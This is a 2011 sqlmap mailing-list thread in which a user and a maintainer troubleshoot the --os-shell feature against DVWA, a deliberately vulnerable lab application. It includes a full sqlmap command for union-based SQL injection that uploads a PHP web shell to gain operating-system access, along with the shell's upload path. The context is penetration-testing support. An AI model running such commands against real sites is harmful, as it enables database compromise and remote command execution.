p.s. --os-shell appears to work properly in our LAMP testing environment (tested for full union and partial union techniques)
On Tue, Sep 6, 2011 at 10:13 AM, Miroslav Stampar <miroslav.stam...@gmail.com> wrote: > hi Ahmed. > > from the traffic file you've sent to me it seems that php shell was > indeed uploaded in request #21 but for some reason nothing was > returned in validation request #22. > > could you please: > > 1) check what do you get in web browser with: > http://172.16.171.134:80/hackable/uploads/tmpupgiv.php > > 2) check inside the virtual machine itself what's the content of that > file there (./hackable/uploads/tmpupgiv.php) > > Kind regards > > On Mon, Sep 5, 2011 at 12:02 PM, Ahmed Shawky <ah...@isecur1ty.org> wrote: >> >> while testing sqlmap against DVWA I noticed it doesn't work like expected >> while using --os-shell >> ./sqlmap.py -u >> "http://172.16.171.134/vulnerabilities/sqli/?id=test&Submit=Submit"; -p id >> --dbms mysql --technique US --union-col 2 --suffix "#" --prefix "'" --cookie >> "PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low" --os-shell -v3 -t >> /home/lnxg33k/Desktop/dvwa.txt --flush-session >> >> -- >> >> Ahmed Shawky El-Antry >> lnxg33k owner "http://lnxg33k.wordpress.com"; >> Isecur1ty team member"http://www.isecur1ty.org"; >> Twitter @lnxg33k >> >> ------------------------------------------------------------------------------ >> Special Offer -- Download ArcSight Logger for FREE! >> Finally, a world-class log management solution at an even better >> price-free! And you'll get a free "Love Thy Logs" t-shirt when you >> download Logger. Secure your free ArcSight Logger TODAY! >> http://p.sf.net/sfu/arcsisghtdev2dev >> _______________________________________________ >> sqlmap-users mailing list >> sqlmap-users@lists.sourceforge.net >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm ------------------------------------------------------------------------------ Special Offer -- Download ArcSight Logger for FREE! Finally, a world-class log management solution at an even better price-free! And you'll get a free "Love Thy Logs" t-shirt when you download Logger. Secure your free ArcSight Logger TODAY! http://p.sf.net/sfu/arcsisghtdev2dev _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
